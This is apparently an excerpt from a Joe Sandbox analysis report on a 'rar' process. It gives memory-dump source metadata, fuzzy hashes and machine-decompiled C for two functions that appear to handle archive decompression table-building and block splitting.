                                                                                                            0x7ff650b55acc
                                                                                                            0x7ff650b55afc
                                                                                                            0x7ff650b55b00
                                                                                                            0x7ff650b55b18
                                                                                                            0x7ff650b55b1c
                                                                                                            0x7ff650b55b2a
                                                                                                            0x7ff650b55b2c
                                                                                                            0x7ff650b55b32
                                                                                                            0x7ff650b55b35
                                                                                                            0x7ff650b55b3b
                                                                                                            0x7ff650b55b40
                                                                                                            0x7ff650b55b45
                                                                                                            0x7ff650b55b5d
                                                                                                            0x7ff650b55b79
                                                                                                            0x7ff650b55b80
                                                                                                            0x7ff650b55b97
                                                                                                            0x7ff650b55b9c
                                                                                                            0x7ff650b55ba7
                                                                                                            0x7ff650b55bd5

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5db1529a7428b0fa8c7a6c1b9fbc80255775ea36c1a7cb7434c463ccf380ebc4
                                                                                                            • Instruction ID: a9aaaa9f2c4fe0ed7d4a8c56dac50f9e256810364f0c569004df21badbb6ee62
                                                                                                            • Opcode Fuzzy Hash: 5db1529a7428b0fa8c7a6c1b9fbc80255775ea36c1a7cb7434c463ccf380ebc4
                                                                                                            • Instruction Fuzzy Hash: 99C1E476B1468296E768CE28C1E47B83391FB49B4AF084135DB4F97759EE3EEA41C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B61784 Relevance: .3, Instructions: 304COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 67%
                                                                                                            			E00007FF67FF650B61784(long long __rbx, void* __rcx, long long __rsi, void* __r9, void* __r10) {
				void* __rbp;
				void* _t93;
				unsigned int _t119;
				unsigned int _t124;
				signed int _t141;
				void* _t144;
				char _t145;
				signed int _t146;
				signed int _t150;
				signed char _t152;
				void* _t188;
				void* _t207;
				void* _t212;
				signed long long _t214;
				signed long long _t215;
				void* _t217;
				signed long long _t233;
				unsigned long long _t248;
				signed long long _t249;
				intOrPtr* _t258;
				void* _t265;
				signed long long _t266;
				void* _t274;
				void* _t275;
				void* _t278;
				void* _t280;

				_t275 = __r10;
				_t274 = __r9;
				 *((long long*)(_t265 + 0x10)) = __rbx;
				 *((long long*)(_t265 + 0x18)) = __rsi;
				_push(_t280);
				_t263 = _t265 - 0xf0;
				_t266 = _t265 - 0x1f0;
				_t214 =  *0x50b978f0; // 0x27db226282f1
				_t215 = _t214 ^ _t266;
				 *(_t265 - 0xf0 + 0xe0) = _t215;
				_t258 = __rcx + 8;
				_t217 = __rcx;
				if ( *_t258 -  *((intOrPtr*)(__rcx + 0xe8)) - 0x19 <= 0) goto 0x50b617d7;
				_t188 = E00007FF67FF650B62D28( *_t258 -  *((intOrPtr*)(__rcx + 0xe8)) - 0x19, __rcx, __rcx);
				if (_t188 == 0) goto 0x50b61b0b;
				E00007FF67FF650B3630C( ~( *(_t217 + 0xc)) & 0x00000007, _t258);
				E00007FF67FF650B36324(_t258);
				asm("bt eax, 0xf");
				if (_t188 >= 0) goto 0x50b6181a;
				 *(_t217 + 0xe8a8) = 1;
				_t93 = E00007FF67FF650B5EEC8(_t217, _t217 + 0x9a48, _t217, _t217 + 0xe710, __r9);
				goto 0x50b61be6;
				 *(_t217 + 0xe8a8) =  *(_t217 + 0xe8a8) & 0x00000000;
				 *(_t217 + 0x9a40) =  *(_t217 + 0x9a40) & 0x00000000;
				 *(_t217 + 0x9a44) =  *(_t217 + 0x9a44) & 0x00000000;
				asm("bt eax, 0xe");
				if (_t188 < 0) goto 0x50b61849;
				r8d = 0x194;
				E00007FF67FF650B6C1A0(_t93, 0, _t217 + 0xe714, _t217, _t217 + 0xe710);
				E00007FF67FF650B3630C(2, _t258);
				r15d = r15d | 0xffffffff;
				r14d = E00007FF67FF650B36324(_t258);
				r14d = r14d >> 0xc;
				E00007FF67FF650B3630C(4, _t258);
				if (r14b != 0xf) goto 0x50b618cf;
				r14d = E00007FF67FF650B36324(_t258) >> 0x0000000c & 0x000000ff;
				E00007FF67FF650B3630C(4, _t258);
				if (r14d != 0) goto 0x50b618a6;
				 *((char*)(_t266 + __rsi + 0x20)) = 0xf;
				goto 0x50b618d4;
				r14d = r14d + 2;
				r14d = r14d + r15d;
				if (0 - 0x14 >= 0) goto 0x50b618ca;
				if (_t215 - 0x14 >= 0) goto 0x50b61c11;
				 *((char*)(_t266 + _t215 + 0x20)) = 0;
				if (r14d != 0) goto 0x50b618aa;
				goto 0x50b618d4;
				 *((intOrPtr*)(_t266 + __rsi + 0x20)) = r14b;
				if (1 + r15d + 1 - 0x14 < 0) goto 0x50b6185c;
				_t278 = _t217 + 0x3cb4;
				r9d = 0x14;
				E00007FF67FF650B605A8(_t217, _t266 + 0x20, _t278);
				r14d = 0;
				_t26 = _t280 + 0x10; // 0x10
				r11d = _t26;
				_t27 = _t280 + 3; // 0x3
				r15d = _t27;
				if ( *_t258 -  *((intOrPtr*)(_t217 + 0xe8)) - 5 <= 0) goto 0x50b61926;
				if (E00007FF67FF650B62D28( *_t258 -  *((intOrPtr*)(_t217 + 0xe8)) - 5, _t217, _t217) == 0) goto 0x50b61b0b;
				r11d = 0x10;
				_t233 =  *((intOrPtr*)(_t258 + 0x10));
				_t248 =  *_t258;
				r10d =  *(_t258 + 4);
				r8d =  *(_t233 + _t248 + 1) & 0x000000ff;
				r8d = r8d | ( *(_t233 + _t248) & 0x000000ff) << 0x00000008;
				r8d = r8d << 8;
				r8d = r8d |  *(_t233 + _t248 + 2) & 0x000000ff;
				r8d = r8d >> 8 - r10d;
				r8d = r8d & 0x0000fffe;
				if (r8d -  *((intOrPtr*)(_t278 + 4 + _t233 * 4)) >= 0) goto 0x50b6199f;
				_t249 = _t248 >> r11d -  *((intOrPtr*)(_t278 + 0x84));
				_t141 = ( *(_t249 + _t278 + 0x88) & 0x000000ff) + r10d;
				 *_t258 =  *_t258 + (_t141 >> 3);
				 *(_t258 + 4) = _t141 & 0x00000007;
				goto 0x50b61a09;
				r9d = 0xf;
				_t144 = ( *(_t278 + 0x488 + _t249 * 2) & 0x0000ffff) + 1;
				if (_t144 - r9d >= 0) goto 0x50b619ca;
				if (r8d -  *((intOrPtr*)(_t278 + (_t249 + 1) * 4)) < 0) goto 0x50b619c7;
				_t145 = _t144 + 1;
				if (_t145 - r9d < 0) goto 0x50b619b5;
				goto 0x50b619ca;
				r9d = _t145;
				_t146 = _t275 + _t274;
				 *_t258 =  *_t258 + (_t146 >> 3);
				 *(_t258 + 4) = _t146 & 0x00000007;
				r8d = r8d -  *((intOrPtr*)(_t278 + 4 + _t215 * 4));
				r8d = r8d >> r11d - r9d;
				asm("sbb eax, eax");
				_t150 =  *(_t278 + 0xc88 + _t215 * 2) & 0x0000ffff;
				if (_t150 - r11w >= 0) goto 0x50b61a27;
				_t152 = _t150 +  *((intOrPtr*)(_t280 + _t217 + 0xe714)) & 0x0000000f;
				 *(_t266 + _t280 + 0x40) = _t152;
				r14d = r14d + 1;
				goto 0x50b61aed;
				if (_t152 - 0x12 >= 0) goto 0x50b61a90;
				if (_t152 != r11w) goto 0x50b61a48;
				E00007FF67FF650B36324(_t258);
				goto 0x50b61a5a;
				_t119 = E00007FF67FF650B36324(_t258);
				E00007FF67FF650B3630C(7, _t258);
				if (r14d == 0) goto 0x50b61b0b;
				if (r14d - 0x194 >= 0) goto 0x50b61afa;
				 *(_t266 + _t280 + 0x40) =  *((intOrPtr*)(_t266 + _t215 + 0x40));
				r14d = r14d + 1;
				_t207 = (_t119 >> 9) + 0xb - 1;
				if (_t207 != 0) goto 0x50b61a6b;
				goto 0x50b61ae7;
				if (_t207 != 0) goto 0x50b61aa7;
				E00007FF67FF650B36324(_t258);
				goto 0x50b61ab9;
				_t124 = E00007FF67FF650B36324(_t258);
				E00007FF67FF650B3630C(7, _t258);
				if (r14d - 0x194 >= 0) goto 0x50b61afa;
				r14d = r14d + 1;
				if (_t215 - 0x194 >= 0) goto 0x50b61c11;
				 *((char*)(_t266 + _t215 + 0x40)) = 0;
				if ((_t124 >> 9) + 0xb - 1 != 0) goto 0x50b61ac1;
				r11d = 0x10;
				if (r14d - 0x194 < 0) goto 0x50b61903;
				 *((char*)(_t217 + 0xe8ad)) = 1;
				_t212 =  *_t258 -  *((intOrPtr*)(_t217 + 0xe8));
				if (_t212 <= 0) goto 0x50b61b12;
				goto 0x50b61be6;
				r9d = 0x12b;
				E00007FF67FF650B605A8(_t217, _t266 + 0x40, _t217 + 0x104);
				r9d = 0x3c;
				E00007FF67FF650B605A8(_t217, _t265 - 0xf0 + 0x6b, _t217 + 0xff0);
				r9d = 0x11;
				E00007FF67FF650B605A8(_t217, _t263 + 0xa7, _t217 + 0x1edc);
				r9d = 0x1c;
				E00007FF67FF650B605A8(_t217, _t263 + 0xb8, _t217 + 0x2dc8);
				asm("movups xmm0, [ecx]");
				asm("movups xmm1, [ecx+0x10]");
				asm("movups [ebx], xmm0");
				asm("movups xmm0, [ecx+0x20]");
				asm("movups [ebx+0x10], xmm1");
				asm("movups xmm1, [ecx+0x30]");
				asm("movups [ebx+0x20], xmm0");
				asm("movups xmm0, [ecx+0x40]");
				asm("movups [ebx+0x30], xmm1");
				asm("movups xmm1, [ecx+0x50]");
				asm("movups [ebx+0x40], xmm0");
				asm("movups xmm0, [ecx+0x60]");
				asm("movups [ebx+0x50], xmm1");
				asm("movups xmm1, [ecx+0x70]");
				asm("movups [ebx+0x60], xmm0");
				asm("movups [ebx-0x10], xmm1");
				if (_t212 != 0) goto 0x50b61b8e;
				asm("movups xmm0, [ecx]");
				asm("movups [ebx], xmm0");
				 *((intOrPtr*)(_t217 + 0xe714 + _t215 + 0x10)) =  *((intOrPtr*)(_t266 + 0x40 + _t215 + 0x10));
				return E00007FF67FF650B69D10(1,  *((intOrPtr*)(_t266 + 0x40 + _t215 + 0x10)),  *(_t263 + 0xe0) ^ _t266);
			}





























                                                                                                            0x7ff650b61784
                                                                                                            0x7ff650b61784
                                                                                                            0x7ff650b61784
                                                                                                            0x7ff650b61789
                                                                                                            0x7ff650b61792
                                                                                                            0x7ff650b61796
                                                                                                            0x7ff650b6179e
                                                                                                            0x7ff650b617a5
                                                                                                            0x7ff650b617ac
                                                                                                            0x7ff650b617af
                                                                                                            0x7ff650b617bc
                                                                                                            0x7ff650b617c3
                                                                                                            0x7ff650b617c8
                                                                                                            0x7ff650b617cf
                                                                                                            0x7ff650b617d1
                                                                                                            0x7ff650b617e2
                                                                                                            0x7ff650b617ea
                                                                                                            0x7ff650b617ef
                                                                                                            0x7ff650b617f3
                                                                                                            0x7ff650b617fc
                                                                                                            0x7ff650b61810
                                                                                                            0x7ff650b61815
                                                                                                            0x7ff650b6181a
                                                                                                            0x7ff650b61821
                                                                                                            0x7ff650b61828
                                                                                                            0x7ff650b6182f
                                                                                                            0x7ff650b61833
                                                                                                            0x7ff650b6183e
                                                                                                            0x7ff650b61844
                                                                                                            0x7ff650b61851
                                                                                                            0x7ff650b61858
                                                                                                            0x7ff650b61864
                                                                                                            0x7ff650b6186f
                                                                                                            0x7ff650b61873
                                                                                                            0x7ff650b6187c
                                                                                                            0x7ff650b61891
                                                                                                            0x7ff650b61895
                                                                                                            0x7ff650b6189d
                                                                                                            0x7ff650b6189f
                                                                                                            0x7ff650b618a4
                                                                                                            0x7ff650b618a6
                                                                                                            0x7ff650b618aa
                                                                                                            0x7ff650b618b0
                                                                                                            0x7ff650b618ba
                                                                                                            0x7ff650b618c0
                                                                                                            0x7ff650b618c8
                                                                                                            0x7ff650b618cd
                                                                                                            0x7ff650b618cf
                                                                                                            0x7ff650b618d9
                                                                                                            0x7ff650b618db
                                                                                                            0x7ff650b618e2
                                                                                                            0x7ff650b618f3
                                                                                                            0x7ff650b618f8
                                                                                                            0x7ff650b618fb
                                                                                                            0x7ff650b618fb
                                                                                                            0x7ff650b618ff
                                                                                                            0x7ff650b618ff
                                                                                                            0x7ff650b6190e
                                                                                                            0x7ff650b6191a
                                                                                                            0x7ff650b61920
                                                                                                            0x7ff650b61926
                                                                                                            0x7ff650b6192a
                                                                                                            0x7ff650b6192d
                                                                                                            0x7ff650b61935
                                                                                                            0x7ff650b6193e
                                                                                                            0x7ff650b61946
                                                                                                            0x7ff650b6194f
                                                                                                            0x7ff650b61955
                                                                                                            0x7ff650b61960
                                                                                                            0x7ff650b6196c
                                                                                                            0x7ff650b61978
                                                                                                            0x7ff650b61984
                                                                                                            0x7ff650b6198c
                                                                                                            0x7ff650b61991
                                                                                                            0x7ff650b6199d
                                                                                                            0x7ff650b6199f
                                                                                                            0x7ff650b619a5
                                                                                                            0x7ff650b619aa
                                                                                                            0x7ff650b619b8
                                                                                                            0x7ff650b619ba
                                                                                                            0x7ff650b619c3
                                                                                                            0x7ff650b619c5
                                                                                                            0x7ff650b619c7
                                                                                                            0x7ff650b619ca
                                                                                                            0x7ff650b619d6
                                                                                                            0x7ff650b619dc
                                                                                                            0x7ff650b619e5
                                                                                                            0x7ff650b619ea
                                                                                                            0x7ff650b619fc
                                                                                                            0x7ff650b61a00
                                                                                                            0x7ff650b61a0d
                                                                                                            0x7ff650b61a17
                                                                                                            0x7ff650b61a1a
                                                                                                            0x7ff650b61a1f
                                                                                                            0x7ff650b61a22
                                                                                                            0x7ff650b61a2b
                                                                                                            0x7ff650b61a34
                                                                                                            0x7ff650b61a36
                                                                                                            0x7ff650b61a46
                                                                                                            0x7ff650b61a48
                                                                                                            0x7ff650b61a5d
                                                                                                            0x7ff650b61a65
                                                                                                            0x7ff650b61a74
                                                                                                            0x7ff650b61a82
                                                                                                            0x7ff650b61a87
                                                                                                            0x7ff650b61a8a
                                                                                                            0x7ff650b61a8c
                                                                                                            0x7ff650b61a8e
                                                                                                            0x7ff650b61a93
                                                                                                            0x7ff650b61a95
                                                                                                            0x7ff650b61aa5
                                                                                                            0x7ff650b61aa7
                                                                                                            0x7ff650b61abc
                                                                                                            0x7ff650b61aca
                                                                                                            0x7ff650b61acf
                                                                                                            0x7ff650b61ad8
                                                                                                            0x7ff650b61ade
                                                                                                            0x7ff650b61ae5
                                                                                                            0x7ff650b61ae7
                                                                                                            0x7ff650b61af4
                                                                                                            0x7ff650b61b00
                                                                                                            0x7ff650b61b07
                                                                                                            0x7ff650b61b09
                                                                                                            0x7ff650b61b0d
                                                                                                            0x7ff650b61b19
                                                                                                            0x7ff650b61b27
                                                                                                            0x7ff650b61b33
                                                                                                            0x7ff650b61b40
                                                                                                            0x7ff650b61b4c
                                                                                                            0x7ff650b61b5c
                                                                                                            0x7ff650b61b68
                                                                                                            0x7ff650b61b78
                                                                                                            0x7ff650b61b8e
                                                                                                            0x7ff650b61b91
                                                                                                            0x7ff650b61b95
                                                                                                            0x7ff650b61b98
                                                                                                            0x7ff650b61b9c
                                                                                                            0x7ff650b61ba0
                                                                                                            0x7ff650b61ba4
                                                                                                            0x7ff650b61ba8
                                                                                                            0x7ff650b61bac
                                                                                                            0x7ff650b61bb0
                                                                                                            0x7ff650b61bb4
                                                                                                            0x7ff650b61bb8
                                                                                                            0x7ff650b61bbc
                                                                                                            0x7ff650b61bc0
                                                                                                            0x7ff650b61bc7
                                                                                                            0x7ff650b61bce
                                                                                                            0x7ff650b61bd6
                                                                                                            0x7ff650b61bd8
                                                                                                            0x7ff650b61be0
                                                                                                            0x7ff650b61be3
                                                                                                            0x7ff650b61c10

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: de230919c3989f8cbaf866b2f98482e0a1953e69cc850fac6e84137d2146c549
                                                                                                            • Instruction ID: bf8ae232264bac78154cb512567d3806d77ff34907c6f7d447c2db157cf2ffa4
                                                                                                            • Opcode Fuzzy Hash: de230919c3989f8cbaf866b2f98482e0a1953e69cc850fac6e84137d2146c549
                                                                                                            • Instruction Fuzzy Hash: AAC1C262E1868357EB248B28C1847F82790EB56748F1C8A31DE4FA7786DF3EE546C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B3D698 Relevance: .3, Instructions: 295COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 63%
                                                                                                            			E00007FF67FF650B3D698(signed int __eax, intOrPtr __edx, signed int __rax, signed int __rcx, long long __r9) {
				void* __rbx;
				void* __rsi;
				void* __rbp;
				intOrPtr _t117;
				signed int _t119;
				signed int _t138;
				intOrPtr _t140;
				void* _t150;
				intOrPtr _t161;
				void* _t183;
				signed long long _t203;
				signed long long _t207;
				signed int _t209;
				intOrPtr* _t216;
				void* _t220;
				void* _t223;
				signed long long _t225;
				intOrPtr* _t227;
				void* _t228;
				void* _t231;
				void* _t233;
				intOrPtr* _t235;
				void* _t238;
				signed long long _t239;
				void* _t243;
				void* _t244;
				signed long long _t246;
				void* _t250;
				void* _t251;
				void* _t253;
				signed int* _t257;
				signed int* _t258;
				signed int* _t259;
				void* _t262;

				 *((long long*)(_t243 + 0x20)) = __r9;
				 *(_t243 + 0x18) = r8d;
				 *((intOrPtr*)(_t243 + 0x10)) = __edx;
				_push(_t238);
				_push(_t233);
				_push(_t251);
				_push(_t253);
				_t244 = _t243 - 0x38;
				_t209 = __rcx;
				 *((char*)(__rcx + 0x4ec)) = __eax & 0xffffff00 | __r9 != 0x00000000;
				if (__r9 != 0) goto 0x50b3d6d6;
				if ( *((intOrPtr*)(__rcx + 0xe4)) == 3) goto 0x50b3d6df;
				if ( *((char*)(__rcx + 0xe0)) == 0) goto 0x50b3d6e6;
				goto 0x50b3db1e;
				r15d = 0;
				 *((intOrPtr*)(_t244 + 0x24)) = r15d;
				r12d = 0;
				 *(_t244 + 0x20) = 0 |  *((intOrPtr*)(__rcx + 0x544)) == 0x00000002;
				 *((intOrPtr*)(_t244 + 0x2c)) = r12d;
				 *((intOrPtr*)(_t244 + 0x28)) = 0;
				if (r8d == 0) goto 0x50b3db1b;
				r13d = 0;
				 *(_t244 + 0x80) = 0;
				_t161 =  *((intOrPtr*)(__rcx + 0x21558));
				if (_t161 <= 0) goto 0x50b3d813;
				r14d =  *((intOrPtr*)(_t244 + 0x28));
				r15d =  *((intOrPtr*)(_t244 + 0x88));
				r8d =  *(_t244 + 0x90);
				r8d = r8d - r12d;
				if (_t161 == 0) goto 0x50b3d7f5;
				_t150 =  <  ? r8d : 0x10000;
				r14d = r14d + 1;
				_t225 = __rax * 0x4838 +  *((intOrPtr*)(__rcx + 8));
				 *_t225 = __rcx;
				 *(_t225 + 8) = _t251 + _t262 &  *(__rcx + 0x52c);
				 *((intOrPtr*)(_t225 + 0xc)) = 0x10000;
				_t203 =  *((intOrPtr*)(__rcx + 0x18));
				 *(_t225 + 0x4830) =  *(_t225 + 0x4830) & 0x00000000;
				 *((intOrPtr*)(_t225 + 0x4834)) = r13d;
				 *((long long*)(_t225 + 0x820)) = _t203 + __rcx * 4;
				if ( *((char*)(__rcx + 0x4ec)) == 0) goto 0x50b3d7af;
				 *((char*)(_t225 + 0x82c)) = 0;
				if ( *((intOrPtr*)(__rcx + 0x21558)) - 1 <= 0) goto 0x50b3d7d9;
				if (0 != 0) goto 0x50b3d7c1;
				if (r8d == _t150) goto 0x50b3d7d9;
				_t246 = _t225;
				E00007FF67FF650B5B224(_t203, __rcx,  *((intOrPtr*)(__rcx + 0x21340)), 0x7ff650b3d4e0, _t233, _t246, _t262);
				goto 0x50b3d7e1;
				E00007FF67FF650B3D4EC(_t209, _t209, 0x7ff650b3d4e0, _t233, _t238, _t246, _t250);
				r12d = r12d + _t150;
				r13d = r13d + 1;
				if (1 -  *((intOrPtr*)(_t209 + 0x21558)) < 0) goto 0x50b3d741;
				r15d =  *((intOrPtr*)(_t244 + 0x24));
				 *((intOrPtr*)(_t244 + 0x28)) = r14d;
				_t257 =  *(_t244 + 0x98);
				 *((intOrPtr*)(_t244 + 0x2c)) = r12d;
				E00007FF67FF650B5B518( *((intOrPtr*)(_t209 + 0x21340)));
				sil = 0;
				r12d = 0;
				 *(_t244 + 0x80) = sil;
				if (r13d == 0) goto 0x50b3db04;
				_t239 = _t203 * 0x4838;
				 *(_t244 + 0x98) = _t239;
				_t231 =  *((intOrPtr*)(_t209 + 8)) + _t239;
				if ( *((char*)(_t209 + 0x4ec)) != 0) goto 0x50b3da04;
				_t117 =  *((intOrPtr*)(_t209 + 0xe4));
				if (_t117 == 3) goto 0x50b3d9f7;
				if (_t117 == 2) goto 0x50b3d87c;
				if ( *((char*)(_t231 + 0x10)) != 0) goto 0x50b3d87c;
				goto 0x50b3d97d;
				_t235 =  ==  ? _t209 + 0xe8 : _t231 - 0x4824;
				bpl = 1;
				r8d = 0;
				r11d = 0;
				r9d = 0;
				_t216 = _t235;
				_t140 =  *((intOrPtr*)(_t231 - _t235 + _t216 + 0x14));
				_t55 = _t246 + 1; // 0x1
				_t119 =  <=  ? r8d : _t55;
				r8d = _t119;
				if (_t140 - 0x32 <= 0) goto 0x50b3d8c4;
				if ( *_t216 == 0) goto 0x50b3d8cd;
				goto 0x50b3d8d0;
				if (_t140 != 0) goto 0x50b3d8d0;
				if ( *_t216 - 0x32 <= 0) goto 0x50b3d8d0;
				r11d = r11d + 1;
				r9d = r9d + 1;
				if (r9d - 0x100 < 0) goto 0x50b3d8a6;
				if (_t119 <= 0) goto 0x50b3d975;
				if ( *((intOrPtr*)(_t231 + 0xc)) - 0x800 < 0) goto 0x50b3d975;
				asm("cdq");
				if (r11d - _t119 - _t140 >> 1 <= 0) goto 0x50b3d916;
				r8d = 2;
				E00007FF67FF650B43454( *((intOrPtr*)(_t231 + 8)), _t209 + 0xe8, _t209 + 0x1a638);
				goto 0x50b3d91f;
				_t59 = _t253 - 1; // -1
				_t183 = r12d - _t59;
				if (_t183 != 0) goto 0x50b3d975;
				asm("movups xmm0, [eax]");
				asm("movups [esi], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [esi+0x10], xmm1");
				asm("movups xmm0, [eax+0x20]");
				asm("movups [esi+0x20], xmm0");
				asm("movups xmm1, [eax+0x30]");
				asm("movups [esi+0x30], xmm1");
				asm("movups xmm0, [eax+0x40]");
				asm("movups [esi+0x40], xmm0");
				asm("movups xmm1, [eax+0x50]");
				asm("movups [esi+0x50], xmm1");
				asm("movups xmm0, [eax+0x60]");
				asm("movups [esi+0x60], xmm0");
				asm("movups xmm1, [eax+0x70]");
				asm("movups [esi-0x10], xmm1");
				if (_t183 != 0) goto 0x50b3d92b;
				sil =  *(_t244 + 0x80);
				if ( *(_t244 + 0x20) == bpl) goto 0x50b3d9a8;
				_t220 = _t209 + 0x1a638;
				r8d = bpl & 0xffffffff;
				r8d = r8d ^ 0x00000001;
				r8d = 1 + _t246 * 2;
				E00007FF67FF650B43454( *((intOrPtr*)(_t231 + 8)), _t231 + 0x7ff650b3d4f4, _t220);
				 *(_t244 + 0x20) = bpl;
				if (bpl == 0) goto 0x50b3d9ef;
				if (sil != 0) goto 0x50b3d9ef;
				r8d = 0;
				_t227 = _t231 + 0x14;
				_t207 =  *(_t209 + 0x4e8);
				if ( *_t227 -  *((intOrPtr*)(_t231 + 0x14 + _t207 * 4)) >= 0) goto 0x50b3d9cf;
				 *(_t209 + 0x4e8) = r8d;
				if ( *_t227 == 0) goto 0x50b3d9e4;
				r8d = r8d + 1;
				_t228 = _t227 + 4;
				if (r8d - 0x100 < 0) goto 0x50b3d9b9;
				sil = 1;
				 *(_t244 + 0x80) = sil;
				if ( *((char*)(_t209 + 0x4ec)) == 0) goto 0x50b3dadc;
				r9d =  *((intOrPtr*)(_t231 + 8));
				r9d = r9d -  *((intOrPtr*)(_t244 + 0x88));
				r11d = 0;
				r8d =  *(_t231 + 0x414);
				if ( *((intOrPtr*)(_t231 + 0x4830)) <= 0) goto 0x50b3daa9;
				_t223 = (_t220 + 0x83 << 4) + _t231;
				r10d =  *(_t223 + 4);
				r10d = r10d;
				if (r10d - 0x64 <= 0) goto 0x50b3da6f;
				if (r8d == 8) goto 0x50b3da6f;
				if (_t207 -  *((intOrPtr*)(_t244 + 0xa0)) >= 0) goto 0x50b3da6f;
				 *_t257 = r8d;
				r15d = r15d + 1;
				_t257[1] = _t228 + __r9;
				_t257[2] = r10d;
				_t258 =  &(_t257[4]);
				if (_t207 -  *((intOrPtr*)(_t244 + 0xa0)) >= 0) goto 0x50b3daa1;
				asm("movups xmm0, [ecx]");
				r15d = r15d + 1;
				r11d = r11d + 1;
				asm("repe inc ecx");
				_t258[1] = _t258[1] + r9d;
				_t259 =  &(_t258[4]);
				if (r11d -  *((intOrPtr*)(_t231 + 0x4830)) < 0) goto 0x50b3da28;
				 *(_t244 + 0x98) = _t259;
				if (r8d == 8) goto 0x50b3dadc;
				if (_t207 -  *((intOrPtr*)(_t244 + 0xa0)) >= 0) goto 0x50b3dadc;
				_t138 =  *((intOrPtr*)(_t231 + 0xc)) -  *((intOrPtr*)(_t223 + 8)) +  *(_t223 + 4);
				if (_t138 - 0x64 <= 0) goto 0x50b3dadc;
				 *_t259 = r8d;
				r15d = r15d + 1;
				_t259[1] = _t228 + __r9;
				_t259[2] = _t138;
				r12d = r12d + 1;
				 *(_t244 + 0x98) =  *(_t244 + 0x98) + 0x4838;
				if (r12d - r13d < 0) goto 0x50b3d847;
				 *((intOrPtr*)(_t244 + 0x24)) = r15d;
				 *(_t244 + 0x98) =  &(_t259[4]);
				r12d =  *((intOrPtr*)(_t244 + 0x2c));
				if (r12d -  *(_t244 + 0x90) < 0) goto 0x50b3d713;
				return r15d;
			}





































                                                                                                            0x7ff650b3d698
                                                                                                            0x7ff650b3d69d
                                                                                                            0x7ff650b3d6a2
                                                                                                            0x7ff650b3d6a7
                                                                                                            0x7ff650b3d6a8
                                                                                                            0x7ff650b3d6aa
                                                                                                            0x7ff650b3d6ac
                                                                                                            0x7ff650b3d6b2
                                                                                                            0x7ff650b3d6bc
                                                                                                            0x7ff650b3d6c2
                                                                                                            0x7ff650b3d6cb
                                                                                                            0x7ff650b3d6d4
                                                                                                            0x7ff650b3d6dd
                                                                                                            0x7ff650b3d6e1
                                                                                                            0x7ff650b3d6e6
                                                                                                            0x7ff650b3d6f0
                                                                                                            0x7ff650b3d6f8
                                                                                                            0x7ff650b3d6fb
                                                                                                            0x7ff650b3d701
                                                                                                            0x7ff650b3d706
                                                                                                            0x7ff650b3d70d
                                                                                                            0x7ff650b3d713
                                                                                                            0x7ff650b3d716
                                                                                                            0x7ff650b3d721
                                                                                                            0x7ff650b3d727
                                                                                                            0x7ff650b3d734
                                                                                                            0x7ff650b3d739
                                                                                                            0x7ff650b3d741
                                                                                                            0x7ff650b3d744
                                                                                                            0x7ff650b3d747
                                                                                                            0x7ff650b3d75a
                                                                                                            0x7ff650b3d76c
